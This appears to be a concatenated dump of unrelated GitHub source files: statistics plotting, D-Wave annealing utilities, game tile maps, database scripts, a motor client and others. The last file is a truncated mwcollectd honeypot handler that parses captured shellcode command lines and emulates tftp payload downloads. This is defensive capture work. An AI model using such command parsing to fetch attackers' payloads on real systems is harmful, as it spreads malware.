plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.13])\nplt.show()\nX, Y = getPlotP(listXi, 10000, (int)(max(listXi)))\nplt.plot(X,Y)\nplt.show()\nstudList = list()\nfor i in range(10000):\n\tstudList.append(getStud(10))\nMandD(studList)\ntemp = getP((int)(min(studList)),(int)(max(studList)),studList,10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(studList) + i)) + ' - ' + (str)((int)(min(studList) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range(len(temp)):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.5])\nplt.show()\nX, Y = getPlotP(studList, 10000, (int)(max(studList)))\nplt.plot(X,Y)\nplt.show()\n\n#X, Y = getPlotP(standList1, 10000, (int)(max(standList1)))\n#plt.plot(X, Y)\n#plt.show()\n\n","repo_name":"bingelibangable/matStatLab","sub_path":"matstat3/statlab3.py","file_name":"statlab3.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1160176071","text":"import numpy as np\nimport hashlib\n\nfrom minorminer import find_embedding\nfrom dwave.system.composites import FixedEmbeddingComposite\n\nimport matplotlib.pyplot as plt\nimport yaml\n\n\nclass AnnealOffset:\n \"\"\"https://docs.dwavesys.com/docs/latest/c_qpu_0.html#anneal-offsets\n \"\"\"\n\n def __init__(self, tag, graph_params={}):\n self.tag = tag\n self.graph_params = graph_params\n\n def fcn(self, h, offset_min, offset_range):\n h = np.array(h)\n abshrange = max(abs(h)) - min(abs(h))\n fullrange = max(h) - min(h)\n\n if self.tag == \"advproblem\":\n offset_tag = f\"FixEmbedding_AdvanceProblem_{offset_min}_{offset_range}\"\n adv = offset_min + offset_range\n offset_fcn = [adv for q in range(self.graph_params[\"total_vertices\"])]\n nconstraint = self.graph_params[\"total_qubits\"] - self.graph_params[\"total_vertices\"]\n offset_constraint = [offset_min for q in range(nconstraint)]\n offset_fcn.extend(offset_constraint)\n return offset_fcn, offset_tag\n if self.tag == \"advconstraint\":\n offset_tag = f\"FixEmbedding_AdvanceConstraint_{offset_min}_{offset_range}\"\n offset_fcn = [offset_min for q in range(self.graph_params[\"total_vertices\"])]\n adv = offset_min + offset_range\n nconstraint = self.graph_params[\"total_qubits\"] - self.graph_params[\"total_vertices\"]\n offset_constraint = [adv for q in range(nconstraint)]\n offset_fcn.extend(offset_constraint)\n return offset_fcn, offset_tag\n if self.tag == \"constant\":\n return (\n np.zeros(len(h)),\n f\"FixEmbedding_Constant_{offset_min}_{offset_range}_v3_1\",\n )\n if self.tag == \"single_sided_binary\":\n offset_tag = f\"FixEmbedding_Single_Sided_Binary_{offset_min}_z4\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) <= hmid:\n if offset_min < 0:\n offset_fcn.append(offset_min)\n else:\n offset_fcn.append(0)\n else:\n if offset_min < 0:\n offset_fcn.append(0)\n else:\n offset_fcn.append(-1*offset_min)\n return offset_fcn, offset_tag\n if self.tag == \"binary\":\n offset_tag = f\"FixEmbedding_Binary_{offset_min}_{offset_range}_z0\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) <= hmid:\n offset_fcn.append(offset_min)\n else:\n if offset_min < 0:\n offset_fcn.append(offset_min + offset_range)\n else:\n offset_fcn.append(offset_min - offset_range)\n return offset_fcn, offset_tag\n if self.tag == \"test0\":\n offset_tag = \"test0\"\n offset_fcn = [offset_min, 0]\n return offset_fcn, offset_tag\n if self.tag == \"test1\":\n offset_tag = \"test1\"\n offset_fcn = [0, offset_min]\n return offset_fcn, offset_tag\n if self.tag == \"negbinary\":\n offset_tag = f\"FixEmbedding_NegBinary_{offset_min}_{offset_range}_v3_1\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) >= hmid:\n offset_fcn.append(offset_min)\n else:\n if offset_min < 0:\n offset_fcn.append(offset_min + offset_range)\n else:\n offset_fcn.append(offset_min - offset_range)\n return offset_fcn, offset_tag\n if self.tag == \"shiftlinear\":\n offset_tag = f\"FixEmbedding_ShiftLinear_{offset_min}_{offset_range}\"\n absshifth = abs(h) - min(abs(h))\n shiftnormh = absshifth / abshrange\n offset_fcn = shiftnormh * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"negshiftlinear\":\n offset_tag = f\"FixEmbedding_NegShiftLinear_{offset_min}_{offset_range}\"\n invhnorm = -1 * (abs(h) - max(abs(h))) / abshrange\n offset_fcn = invhnorm * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"signedshiftlinear\":\n offset_tag = f\"FixEmbedding_SignedShiftLinear_{offset_min}_{offset_range}\"\n shifth = h - min(h)\n normh = shifth / fullrange\n offset_fcn = normh * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"signednegshiftlinear\":\n offset_tag = (\n f\"FixEmbedding_SignedNegShiftLinear_{offset_min}_{offset_range}\"\n )\n shifth = -1 * (h - max(h)) / fullrange\n offset_fcn = shifth * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"linear\":\n offset_tag = f\"Linear_{offset_min}_{offset_range}\"\n hnorm = abs(h) / max(abs(h))\n offset_fcn = hnorm * offset_range * 0.9 + offset_min * 0.9\n return offset_fcn, offset_tag\n if self.tag == \"neglinear\":\n hnorm = abs(h) / max(abs(h))\n return (\n -1.0 * hnorm * offset_range * 0.9 + offset_range + offset_min * 0.9,\n f\"Neglinear_{offset_min}_{offset_range}\",\n )\n if self.tag == \"signedlinear\":\n hnorm = 0.5 * (1.0 + h / max(abs(h)))\n return (\n hnorm * offset_range * 0.9 + offset_min * 0.9,\n f\"Signedlinear_{offset_min}_{offset_range}\",\n )\n if self.tag == \"negsignedlinear\":\n hnorm = 0.5 * (1.0 - h / max(abs(h)))\n return (\n hnorm * offset_range * 0.9 + offset_min * 0.9,\n f\"Negsignedlinear_{offset_min}_{offset_range}\",\n )\n else:\n print(\n \"Anneal offset not defined.\\nDefine in AnnealOffset class inside qlp.mds.mds_qlpdb\"\n )\n\n\ndef retry_embedding(\n sampler,\n qubo_dict,\n qpu_graph,\n graph_tag,\n target_min=-0.1,\n target_range=0.12,\n n_tries=100,\n):\n def get_embed_min_max_offset(sampler, embedding):\n embed = FixedEmbeddingComposite(sampler, embedding)\n embedding_idx = [idx for embed_list in embedding.values() for idx in embed_list]\n anneal_offset_ranges = np.array(\n embed.properties[\"child_properties\"][\"anneal_offset_ranges\"]\n )\n min_offset = max(\n [offsets[0] for offsets in anneal_offset_ranges[embedding_idx]]\n )\n max_offset = min(\n [offsets[1] for offsets in anneal_offset_ranges[embedding_idx]]\n )\n return embed, min_offset, max_offset\n\n try:\n with open(\n f\"../qlp/mds/embeddings/{graph_tag}_{target_min}_{target_range}_v6.yaml\", \"r\"\n ) as file:\n embedding = yaml.safe_load(file)\n embed, min_offset, max_offset = get_embed_min_max_offset(sampler, embedding)\n embedding_set = {k: set(embedding[k]) for k in embedding}\n return embed, embedding, min_offset, max_offset\n except Exception as e:\n print(e)\n pass\n\n for i in range(n_tries):\n try:\n embedding = find_embedding(qubo_dict, qpu_graph)\n embed, min_offset, max_offset = get_embed_min_max_offset(sampler, embedding)\n if (target_range > max_offset - target_min) or (min_offset > target_min):\n raise ValueError(\n f\"\\n{target_range} > {max_offset - target_min}: Not enough offset range for inhomogeneous driving.\"\n f\"\\n{min_offset} > {target_min}: min_offset needs to be lower.\"\n \"Try another embedding.\"\n )\n else:\n with open(\n f\"../qlp/mds/embeddings/{graph_tag}_{target_min}_{target_range}_v6.yaml\",\n \"w\",\n ) as file:\n safe_embed = {int(k): list(embedding[k]) for k in embedding}\n yaml.safe_dump(safe_embed, file)\n return embed, embedding, min_offset, max_offset\n except Exception as e:\n # print(e)\n continue\n\n\ndef plot_anneal_offset(sampler):\n offsets = np.array(sampler.properties[\"anneal_offset_ranges\"])\n offset_min = offsets[:, 0]\n offset_max = offsets[:, 1]\n fig, axs = plt.subplots(2, 2, figsize=(15, 15), sharey=True, tight_layout=True)\n axs[0, 0].hist(offset_min, bins=30)\n axs[0, 0].set_title(\"offset min\")\n axs[0, 1].hist(offset_max, bins=30)\n axs[0, 1].set_title(\"offset max\")\n axs[1, 0].hist(offset_max - offset_min, bins=30)\n axs[1, 0].set_title(\"offset range\")\n axs[1, 1].hist(0.5 * (offset_max + offset_min), bins=30)\n axs[1, 1].set_title(\"offset mean\")\n plt.draw()\n plt.show()\n\n\ndef find_offset(h, fcn, embedding, offset_min, offset_range):\n anneal_offset = np.zeros(2048) # expects full yield 2000Q\n hlist = []\n hkey = []\n for key in h:\n hlist.append(h[key])\n hkey.append(key)\n offset_value, tag = fcn(hlist, offset_min, offset_range)\n offset_value = {hkey[idx]: offset_value[idx] for idx in range(len(hkey))}\n offset_dict = dict()\n for logical_qubit, qubit in embedding.items():\n for idx in qubit:\n # sets same offset for all qubits in chain\n anneal_offset[idx] = offset_value[idx]\n offset_dict[idx] = offset_value[idx]\n offset_list = []\n for idx in range(len(embedding)):\n for qi in embedding[idx]:\n offset_list.append(offset_dict[qi])\n return list(anneal_offset), tag, offset_list\n\n\ndef insert_result(graph_params, experiment_params, data_params):\n from qlpdb.graph.models import Graph as graph_Graph\n from qlpdb.experiment.models import Experiment as experiment_Experiment\n from qlpdb.data.models import Data as data_Data\n\n # select or insert row in graph\n graph, created = graph_Graph.objects.get_or_create(\n tag=graph_params[\"tag\"], # Tag for graph type (e.g. Hamming(n,m) or K(n,m))\n total_vertices=graph_params[\n \"total_vertices\"\n ], # Total number of vertices in graph\n total_edges=graph_params[\"total_edges\"], # Total number of edges in graph\n max_edges=graph_params[\"max_edges\"], # Maximum number of edges per vertex\n adjacency=graph_params[\n \"adjacency\"\n ], # Sorted adjacency matrix of dimension [N, 2]\n adjacency_hash=graph_params[\n \"adjacency_hash\"\n ], # md5 hash of adjacency list used for unique constraint\n )\n\n # select or insert row in experiment\n experiment, created = experiment_Experiment.objects.get_or_create(\n graph=graph, # Foreign Key to `graph`\n machine=experiment_params[\"machine\"], # Hardware name (e.g. DW_2000Q_5)\n settings=experiment_params[\"settings\"], # Store DWave machine parameters\n settings_hash=experiment_params[\n \"settings_hash\"\n ], # md5 hash of key sorted settings\n p=experiment_params[\"p\"], # Coefficient of penalty term, 0 to 9999.99\n chain_strength=experiment_params[\"chain_strength\"],\n tag=experiment_params[\"tag\"],\n )\n\n # select or insert row in data\n for idx in range(len(data_params[\"spin_config\"])):\n measurement = data_Data.objects.filter(experiment=experiment).order_by(\n \"-measurement\"\n )\n if measurement.exists():\n measurement = measurement.first().measurement + 1\n else:\n measurement = 0\n data, created = data_Data.objects.get_or_create(\n experiment=experiment, # Foreign Key to `experiment`\n measurement=measurement, # Increasing integer field labeling measurement number\n spin_config=list(\n data_params[\"spin_config\"][idx]\n ), # Spin configuration of solution, limited to 0, 1\n chain_break_fraction=9999, #data_params[\"chain_break_fraction\"][idx],\n energy=data_params[\"energy\"][\n idx\n ], # Energy corresponding to spin_config and QUBO\n constraint_satisfaction=data_params[\"constraint_satisfaction\"][idx],\n )\n return data\n\n\ndef graph_summary(tag, graph, qubo):\n \"\"\"\n Get summary statistics of input graph\n :param graph:\n :return:\n \"\"\"\n vertices = np.unique(np.array([i for i in graph]).flatten())\n neighbors = {v: 0 for v in vertices}\n for i in graph:\n neighbors[i[0]] += 1\n neighbors[i[1]] += 1\n params = dict()\n params[\"tag\"] = tag\n params[\"total_vertices\"] = len(vertices)\n params[\"total_edges\"] = len(graph)\n try:\n keylist = np.unique(np.array([key for key in qubo]).flatten())\n params[\"total_qubits\"] = len(keylist)\n except:\n params[\"total_qubits\"] = len(qubo.todense().tolist())\n params[\"max_edges\"] = max(neighbors.values())\n params[\"adjacency\"] = [list(i) for i in list(graph)]\n params[\"adjacency_hash\"] = hashlib.md5(\n str(np.sort(list(graph))).replace(\" \", \"\").encode(\"utf-8\")\n ).hexdigest()\n return params\n\n\ndef experiment_summary(machine, settings, penalty, chain_strength, tag):\n params = dict()\n params[\"machine\"] = machine\n params[\"settings\"] = {\n key: settings[key] for key in settings if key not in [\"anneal_offsets\"]\n }\n params[\"p\"] = penalty\n params[\"chain_strength\"] = chain_strength\n params[\"tag\"] = tag\n params[\"settings_hash\"] = hashlib.md5(\n str([[key, params[\"settings\"][key]] for key in sorted(params[\"settings\"])])\n .replace(\" \", \"\")\n .encode(\"utf-8\")\n ).hexdigest()\n return params\n\n\ndef data_summary(raw, graph_params, experiment_params):\n params = dict()\n params[\"spin_config\"] = raw.iloc[:, : graph_params[\"total_qubits\"]].values\n params[\"energy\"] = (\n raw[\"energy\"].values + experiment_params[\"p\"] * graph_params[\"total_vertices\"]\n )\n #params[\"chain_break_fraction\"] = raw[\"chain_break_fraction\"].values\n params[\"constraint_satisfaction\"] = np.equal(\n params[\"energy\"],\n np.sum(params[\"spin_config\"][:, : graph_params[\"total_vertices\"]], axis=1),\n )\n return params\n\n\ndef QUBO_to_Ising(Q):\n q = np.diagonal(Q)\n QD = np.copy(Q)\n for i in range(len(QD)):\n QD[i, i] = 0.0\n QQ = np.copy(QD + np.transpose(QD))\n J = np.triu(QQ) / 4.0\n uno = np.ones(len(QQ))\n h = q / 2 + np.dot(QQ, uno) / 4\n g = np.dot(uno, np.dot(QD, uno)) / 4.0 + np.dot(q, uno) / 2.0\n # 0-1 basis transform\n h=(-1)*h\n return (J, h, g)\n\ndef Ising_to_QUBO(J, h):\n Q = None\n return Q\n","repo_name":"cchang5/quantum_linear_programming","sub_path":"qlp/mds/mds_qlpdb.py","file_name":"mds_qlpdb.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12571255700","text":"from typing import Any, Dict, Optional\n\nimport pytiled_parser.tiled_object\nfrom arcade import (\n SpriteList,\n TileMap\n)\n\nfrom isometric import isolist\n\n\nclass IsoTileMap(TileMap):\n\n def _calculate_sprite_position(self, sprite, column, row, scaling):\n if self.tiled_map.orientation == \"isometric\":\n sprite.center_x, sprite.center_y = isolist.to_isometric_square(column, row, scaling,\n self.tiled_map.map_size,\n self.tiled_map.tile_size)\n else:\n sprite.center_x = (\n column * (self.tiled_map.tile_size[0] * scaling)\n + sprite.width / 2\n )\n sprite.center_y = (\n self.tiled_map.map_size.height - row - 1\n ) * (self.tiled_map.tile_size[1] * scaling) + sprite.height / 2\n\n def _process_tile_layer(\n self,\n layer: pytiled_parser.TileLayer,\n scaling: float = 1.0,\n use_spatial_hash: Optional[bool] = None,\n hit_box_algorithm: str = \"Simple\",\n hit_box_detail: float = 4.5,\n custom_class: Optional[type] = None,\n custom_class_args: Dict[str, Any] = {},\n ) -> isolist.IsoList:\n\n sprite_list: isolist.IsoList = isolist.IsoList(use_spatial_hash=use_spatial_hash)\n map_array = layer.data\n\n # Loop through the layer and add in the list\n for row_index, row in enumerate(map_array):\n for column_index, item in enumerate(row):\n # Check for an empty tile\n if item == 0:\n continue\n\n tile = self._get_tile_by_gid(item)\n if tile is None:\n raise ValueError(\n (\n f\"Couldn't find tile for item {item} in layer \"\n f\"'{layer.name}' in file '{self.tiled_map.map_file}'\"\n f\"at ({column_index}, {row_index}).\"\n )\n )\n\n my_sprite = self._create_sprite_from_tile(\n tile,\n scaling=scaling,\n hit_box_algorithm=hit_box_algorithm,\n hit_box_detail=hit_box_detail,\n custom_class=custom_class,\n custom_class_args=custom_class_args,\n )\n\n if my_sprite is None:\n print(\n f\"Warning: Could not create sprite number {item} in layer '{layer.name}' {tile.image}\"\n )\n else:\n self._calculate_sprite_position(my_sprite, column_index, row_index, scaling)\n\n # Tint\n if layer.tint_color:\n my_sprite.color = layer.tint_color\n\n # Opacity\n opacity = layer.opacity\n if opacity:\n my_sprite.alpha = int(opacity * 255)\n\n sprite_list.visible = layer.visible\n sprite_list.append(my_sprite)\n\n return sprite_list\n","repo_name":"DragonMoffon/IsoCade","sub_path":"isometric/isomap.py","file_name":"isomap.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9906716636","text":"import pathlib\nimport unittest\nfrom akicnpj.downloader import AkiMunicipioDownloader\nfrom akicnpj.extractor import AkiExtractor\nfrom akicnpj.object.table.municipio import AkiMunicipio\nfrom akicnpj.reader import AkiMunicipioReader\nfrom akicnpj.finder import AkiFinder\n\nROOT = pathlib.Path(__file__).parent.parent\nDATA_PATH = ROOT.joinpath(\"data\")\nEXTRACT_PATH = DATA_PATH.joinpath(\"extract\")\n\n\nclass MunicipioTestCase(unittest.TestCase):\n zip_files = []\n\n def test_download(self):\n files = list(AkiMunicipioDownloader().download())\n self.assertGreater(len(files), 0)\n\n for file in files:\n self.assertIsInstance(file, pathlib.Path)\n self.zip_files.append(file)\n\n def test_extractor(self):\n self.assertGreater(len(self.zip_files), 0)\n\n for file in self.zip_files:\n self.assertTrue(AkiExtractor().run(input_path=file))\n\n def test_find_and_read(self):\n for file in AkiFinder(path=EXTRACT_PATH).search():\n if file.category == file.category.CITY:\n with AkiMunicipioReader(file.path, encoding=\"iso-8859-1\") as reader:\n for row in reader.rows:\n self.assertIsInstance(row, AkiMunicipio)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"4U360/Aki-CNPJ","sub_path":"tests/municipio.py","file_name":"municipio.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5650593077","text":"import unreal\n \n# WARNING - UE4 has a bug in FBX export\n# the export of hierarchy should be controled by the editor preference 'Keep Attach Hierarchy'\n# but in the code the value of this setting is not checked and the actual variable controling this is uninitialized\n# which leads to different behaviors on different sessions... you may or may not get your hierarchy in the FBX...\n \noutput_file = 'C:\\\\Temp\\\\ue4_output.fbx'\n \nselected_actors = unreal.EditorLevelLibrary.get_selected_level_actors()\nif len(selected_actors) == 0:\n print(\"No actor selected, nothing to export\")\n quit()\n \ntask = unreal.AssetExportTask()\ntask.object = selected_actors[0].get_world()\ntask.filename = output_file\ntask.selected = True\ntask.replace_identical = False\ntask.prompt = False\ntask.automated = True\ntask.options = unreal.FbxExportOption()\ntask.options.vertex_color = False\ntask.options.collision = False\ntask.options.level_of_detail = False\nunreal.Exporter.run_asset_export_task(task)","repo_name":"ue4plugins/PythonSamples","sub_path":"scripts/ImportExport/Export_selected_actors_to_FBX.py","file_name":"Export_selected_actors_to_FBX.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"32"} +{"seq_id":"7129404434","text":"import sqlite3\n\n#create a connection (a connection object) the db\nmyConn = sqlite3.connect(\"parkrun_db.db\")\n\n# create a cursor\nmyCursor = myConn.cursor()\n\nSQLStatement = \"\"\n\n#list the fields in a dictionary. the key is the field name\n#the value is the list of parameters for that field\nChaptersfields =\t{\n \"ChapterID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"ChapterName\":\"TEXT NOT NULL\",\n \"ChapterAddress\":\"TEXT NOT NULL\",\n \"ChapterPhoto\":\"TEXT\",\n \"ChapterEmail\":\"TEXT NOT NULL\",\n \"CourseMap\":\"TEXT\",\n \"CourseDescription\":\"BLOB\",\n \"Facilities\":\"BLOB\",\n \"LocationOfStart\":\"TEXT NOT NULL\",\n \"GettingTherePublicTransport\":\"BLOB\",\n \"GettingThereFoot\":\"BLOB\",\n \"GettingThereRoad\":\"BLOB\"\n }\n\nRunnersfields = {\n \"RunnerID\": \"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RegistrationDate\": \"TIMESTAMP DEFAULT CURRENT_TIMESTAMP\",\n \"FirstName\": \"TEXT\",\n \"LastName\": \"TEXT\",\n \"HomeRun\": \"INTEGER\",\n \"Gender\": \"INTEGER\",\n \"RunningClubID\": \"INTEGER\",\n \"Email\": \"TEXT\",\n \"Postcode\": \"TEXT\",\n \"SignUpToEmails\": \"INTEGER DEFAULT 1\",\n \"RecentExerciseFrequency\": \"INTEGER\",\n \"MedicalCondition\": \"BLOB\",\n \"EmergencyContactName\": \"TEXT\",\n \"EmergencyContactNumber\": \"TEXT\"\n }\n\nClubsfields = {\n \"RunningClubID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RunningCLubName\":\"TEXT NOT NULL\"\n }\n\nRecentexercisefrequencyfields = {\n \"RecentExerciseFrequencyID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RecentExerciseDescription\":\"TEXT NOT NULL\"\n }\n\nEventsfields={\n \"EventID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"EventDate\":\"TIMESTAMP DEFAULT CURRENT_TIMESTAMP\",\n \"RunnerID\":\"INTEGER NOT NULL\",\n \"RunnerTime\":\"INTEGER NOT NULL\",\n \"ChapterID\":\"INTEGER NOT NULL\"\n }\n\nResultsfields={\n \"ResultID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RunnerID\":\"INTEGER\",\n \"Time\":\"TEXT\",\n \"EventID\":\"INTEGER\"\n}\n\nsql_statement = \"CREATE TABLE \\\"\"\n#Start building the SQL statement with the name of the table\ndef createTable(tablename, fields):\n sql_statement = \"CREATE TABLE \\\"\"\n sql_statement += tablename + \"\\\" (\"\n\n for x in fields:\n sql_statement += \"\\\"\"+x+\"\\\" \"+fields[x]+\",\"\n #Trim the trailing \"'\" and add a closing parenthesis\n return sql_statement[:-1]+\")\"\n\n\n#Execute the SQL Statement\n# myCursor.execute(createTable(\"Chapters\",Chaptersfields))\n# myCursor.execute(createTable(\"Runners\",Runnersfields))\n# myCursor.execute(createTable(\"Events\",Eventsfields))\n# myCursor.execute(createTable(\"Clubs\",Clubsfields))\n# myCursor.execute(createTable(\"RecentExerciseFrequency\",Recentexercisefrequencyfields))\nmyCursor.execute(createTable(\"Results\",Resultsfields))\n\n","repo_name":"SolutionsDigital/Unit-2","sub_path":"Parkrun_Example/create_parkrun_tables.py","file_name":"create_parkrun_tables.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70822783770","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2023/4/27 下午3:37\n@file: anchors.py\n@author: zj\n@description: \n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\n\n\ndef test_scale():\n a = torch.randn(3, 4)\n b = torch.randn(3, 4)\n\n mask = torch.ones(3, 4)\n mask *= 0.5\n mask[1] = 5\n\n aa = a * mask\n bb = b * mask\n loss1 = F.mse_loss(aa, bb, reduction='sum')\n\n aa1 = a[mask == 0.5]\n bb1 = b[mask == 0.5]\n loss2 = F.mse_loss(aa1, bb1, reduction='sum')\n\n aa2 = a[mask == 5]\n bb2 = b[mask == 5]\n loss3 = F.mse_loss(aa2, bb2, reduction='sum')\n\n assert (loss1 - (loss2 * 0.5 * 0.5 + loss3 * 5 * 5)) < 1e-3\n\n loss4 = F.mse_loss(aa1 * 0.5, bb1 * 0.5, reduction='sum')\n loss5 = F.mse_loss(aa2 * 5, bb2 * 5, reduction='sum')\n assert (loss1 - (loss4 + loss5)) < 1e-3\n\n\nif __name__ == '__main__':\n test_scale()\n","repo_name":"zjykzj/YOLOv2","sub_path":"tests/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28576271407","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 15:00:42 2023\n\n@author: ZHU\n\"\"\"\n\nimport psycopg2\nimport numpy as np\nfrom tqdm import tqdm\nimport pandas as pd\n\n# Establish a connection to the PostgreSQL database\nconn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=\"password\"\n)\n\n# Create a cursor object\ncur = conn.cursor()\n\n# Update the table with the values in the dataframe\nlogs = {'order_id': [], 'existing': [], 'updated': [], 'type': [], 'sql_query': []}\n\ntel_data = pd.read_pickle('update_tel.pkl')\n\nfor index, row in tqdm(tel_data.iterrows(), total=len(tel_data)):\n order_id = index\n # tel = row['receiver_mobile'].tolist()\n tel = row['receiver_mobile']\n \n cur.execute(\"SELECT tel FROM tb_privacy_data WHERE order_id = %s\", (order_id,))\n result = cur.fetchone()\n if result is not None:\n # Update existing record\n existing = result[0]\n if existing is None:\n existing = []\n \n new = list(set(tel) - set(existing))\n if len(new) > 0:\n updated = existing + new\n \n logs['order_id'].append(order_id)\n logs['existing'].append(existing)\n logs['updated'].append(updated)\n logs['type'].append('update')\n \n sql_query = \"UPDATE tb_privacy_data SET tel = %s WHERE order_id = %s\"\n params = (updated, order_id)\n logs['sql_query'].append(sql_query % params)\n # cur.execute(sql_query, params)\n \n else:\n # Insert new record\n logs['order_id'].append(order_id)\n logs['existing'].append(np.nan)\n logs['updated'].append(tel)\n logs['type'].append('insert')\n \n sql_query = \"INSERT INTO tb_privacy_data (order_id, tel) VALUES (%s, %s)\"\n params = (order_id, tel)\n logs['sql_query'].append(sql_query % params)\n # cur.execute(sql_query, params)\n \nconn.commit()\ncur.close()\nconn.close()","repo_name":"chineseskin/tb-order-privacy-related-data-db","sub_path":"update_tel_one_by_one.py","file_name":"update_tel_one_by_one.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30018641337","text":"\ndef count_missing_nums(lst):\n nums = []\n for i in lst:\n try:\n nums.append(int(i))\n except:\n continue\n solution = 0\n for i in range(min(nums), max(nums)):\n if i not in nums:\n solution += 1\n return solution\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vBwRuR4mF5yQ4cNuc_18.py","file_name":"vBwRuR4mF5yQ4cNuc_18.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41626564482","text":"\n#? This is the client motor file\n#? It connects to th client and send info about how to move the motor\nimport time\nimport socket\nfrom sys import exit\n\nBUFFER = 512\n\nclass Motor():\n def __init__(self, addr):\n self.connectMotor(addr)\n \n def connectMotor(self, addr):\n try:\n self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.client.connect(addr)\n except ConnectionRefusedError:\n print(\"Server has not started!\")\n exit(-1)\n\n def moveMotor(self, direction):\n if direction == 'forward':\n direction ='F'\n elif direction == 'backward':\n direction='B'\n elif direction=='left':\n direction='L'\n elif direction=='right':\n direction='R'\n elif direction == 'stop':\n direction='S'\n\n self.client.send(str(direction).encode('ascii'))","repo_name":"shreyanshsaha/MarsRoverCSE","sub_path":"Autonomous Versions/Autonomous/motorClient.py","file_name":"motorClient.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17662164093","text":"from mwcollectd import *\n\n\nclass ShellcodeProcessHandler:\n\tdef __init__(self, name, event):\n\t\tif 'commandline' not in event or 'recorder' not in event:\n\t\t\treturn\n\n\t\tself.vfiles = { }\n\n\t\tself.parse( event['commandline'].decode('latin1'), event['recorder'] )\n\n\n\tdef parse(self, cmd, recorder):\n\t\tcommands = [ ]\n\t\tcurr = ''\n\t\tescaping = False\n\t\tseparators = frozenset( ['|', '&'] )\n\n\t\tfor c in cmd:\n\t\t\tif not escaping:\n\t\t\t\tif c == '^':\n\t\t\t\t\tescaping = True\n\t\t\t\telif c in separators:\n\t\t\t\t\tif len(curr) > 0:\n\t\t\t\t\t\tcommands.append(curr)\n\t\t\t\t\t\tcurr = ''\n\t\t\t\telse:\n\t\t\t\t\tcurr += c\n\t\t\telse:\n\t\t\t\tcurr += c\n\t\t\t\tescaping = False\n\n\t\tif len(curr) > 0:\n\t\t\tcommands.append(curr)\n\n\t\tparsed_commands = [ ]\n\n\t\tfor cmd in commands:\n\t\t\tquoter = None\n\t\t\tquotes = frozenset( [\"'\", '\"'] )\n\t\t\tseparators = frozenset( [' ', '\\t', ',', ';'] )\n\t\t\tcurr = ''\n\t\t\tccmd = [ ]\n\n\t\t\tfor c in cmd:\n\t\t\t\tif not quoter:\n\t\t\t\t\tif c in quotes and len(curr) == 0:\n\t\t\t\t\t\tquoter = c\n\t\t\t\t\telif c in separators:\n\t\t\t\t\t\tif len(curr) > 0:\n\t\t\t\t\t\t\tccmd.append(curr)\n\t\t\t\t\t\t\tcurr = ''\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurr += c\n\t\t\t\telse:\n\t\t\t\t\tif c == quoter:\n\t\t\t\t\t\tquoter = None\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurr += c\n\n\t\t\tif len(curr) > 0:\n\t\t\t\tccmd.append(curr)\n\n\t\t\tparsed_commands.append(ccmd)\n\n\t\treturn self.emulate(parsed_commands, recorder)\n\n\n\tdef emulate(self, commands, recorder):\n\t\tfor command in commands:\n\t\t\tif command[0] == 'tftp' or command[0] == 'tftp.exe':\n\t\t\t\t(url, localfile) = self.url_TFTP(command[1:])\n\n\t\t\t\tif url:\n\t\t\t\t\tdispatchEvent('shellcode.download', { 'url': url,\n\t\t\t\t\t\t'localfile': localfile, 'recorder': recorder } )\n\t\t\telif command[0] == 'cmd' and len(command) > 2 and command[1] == 